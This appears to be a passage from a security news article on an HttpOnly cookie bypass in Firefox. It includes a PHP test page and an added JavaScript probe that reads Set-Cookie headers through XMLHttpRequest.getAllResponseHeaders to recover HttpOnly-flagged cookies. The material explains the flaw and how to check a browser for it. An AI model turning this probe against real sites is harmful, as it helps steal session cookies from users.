New Firefox security functionality is vulnerable
Originally, only Internet Explorer 6 SP1 and later supported the cookie format with this additional attribute (Set-Cookie: VAL=023; expires=Tuesday, 24-Jul-07 23:12:40 GMT; httpOnly). So far, only a few sites have used HttpOnly cookies because of compatibility problems. The following piece of PHP code is enough to test one's own server:
    <?php
    // The server sets a cookie that script must not be able to read.
    header("Set-Cookie: hidden=value; httpOnly");
    ?>
    <html>
    <body>
    <script>
    // Shows the cookies visible to script; an empty box means HttpOnly works.
    alert(document.cookie);
    </script>
    </body>
    </html>
When the page is opened in a browser that honours the HttpOnly flag, the alert box stays empty, because script cannot read the cookie through document.cookie.
However, the demonstrated exploit is only possible under unusual conditions. It requires the malicious code to run in the same trust domain as the attacked server (e.g. on a virtual host of the same origin). Furthermore, the server must (re)send the cookie in the Set-Cookie header of the HTTP response to the attacker's request, because that header is what the client can read with the XMLHttpRequest method req.getAllResponseHeaders.
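The client side of that bypass, as an added example that is not code from the original article: the raw string returned by getAllResponseHeaders() is split into header lines, the Set-Cookie lines are parsed, and any cookie carrying the httpOnly attribute is reported as leaked. The probe URL, the function names and the SAMPLE_RESPONSE_HEADERS text are assumptions constructed for this example; the sample stands in for a response from the PHP test page above. In current browsers the XMLHttpRequest specification lists Set-Cookie and Set-Cookie2 as forbidden response-header names, so getAllResponseHeaders() omits them and the probe reports nothing, which is the check to run to confirm that a browser no longer leaks.

```javascript
// Added example, not part of the original article.
// Parses the text that XMLHttpRequest.getAllResponseHeaders() returns
// (header lines separated by CRLF, no status line) into cookie objects.
function parseSetCookieHeaders(rawHeaders) {
  const cookies = [];
  for (const line of rawHeaders.split(/\r?\n/)) {
    const colon = line.indexOf(':');
    if (colon < 0) continue;
    const headerName = line.slice(0, colon).trim().toLowerCase();
    if (headerName !== 'set-cookie' && headerName !== 'set-cookie2') continue;
    // First ';'-separated segment is name=value, the rest are attributes.
    const [pair, ...attrs] = line.slice(colon + 1).split(';').map((s) => s.trim());
    const eq = pair.indexOf('=');
    cookies.push({
      name: eq < 0 ? pair : pair.slice(0, eq),
      value: eq < 0 ? '' : pair.slice(eq + 1),
      httpOnly: attrs.some((a) => a.toLowerCase() === 'httponly'),
    });
  }
  return cookies;
}

// Cookies flagged httpOnly that still appear in readable response headers are
// exactly what the bypass recovers; document.cookie would never show them.
function leakedHttpOnlyCookies(rawHeaders) {
  return parseSetCookieHeaders(rawHeaders).filter((c) => c.httpOnly);
}

// Browser-only part: request a same-origin URL (the origin requirement from the
// text) and hand the leaked cookies to the callback. Outside a browser there is
// no XMLHttpRequest, so the function returns false and does nothing.
function probeHttpOnlyLeak(url, callback) {
  if (typeof XMLHttpRequest === 'undefined') return false;
  const req = new XMLHttpRequest();
  req.open('GET', url, true);
  req.onreadystatechange = function () {
    if (req.readyState !== 4) return;
    callback(leakedHttpOnlyCookies(req.getAllResponseHeaders()));
  };
  req.send(null);
  return true;
}

// Constructed sample of what a vulnerable browser handed back for a response
// from a page like the PHP test above (hypothetical values).
const SAMPLE_RESPONSE_HEADERS =
  'Date: Tue, 24 Jul 2007 23:12:40 GMT\r\n' +
  'Content-Type: text/html\r\n' +
  'Set-Cookie: hidden=value; httpOnly\r\n' +
  'Set-Cookie: VAL=023; expires=Tuesday, 24-Jul-07 23:12:40 GMT; httpOnly\r\n' +
  'Set-Cookie: theme=light\r\n';

// Offline demonstration on the constructed sample: two HttpOnly cookies leak.
for (const c of leakedHttpOnlyCookies(SAMPLE_RESPONSE_HEADERS)) {
  console.log('leaked HttpOnly cookie:', c.name, '=', c.value);
}

// In a page on the attacked origin, the live probe would be started like this
// (the path /index.php is an assumed example, not from the article):
probeHttpOnlyLeak('/index.php', function (leaked) {
  console.log(leaked.length ? 'browser leaks HttpOnly cookies' : 'no leak');
});
```

When run on the constructed sample the parser keeps the third, non-HttpOnly cookie out of the leaked list, and the attribute check is case-insensitive because servers write the flag as httpOnly, HttpOnly or HTTPONLY.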
- XS(T) attack variants which can, in some cases, eliminate the need for TRACE, security advisory by Amit Klein
- Round-up: Ways to bypass HttpOnly (and HTTP Basic auth), security advisory by Amit Klein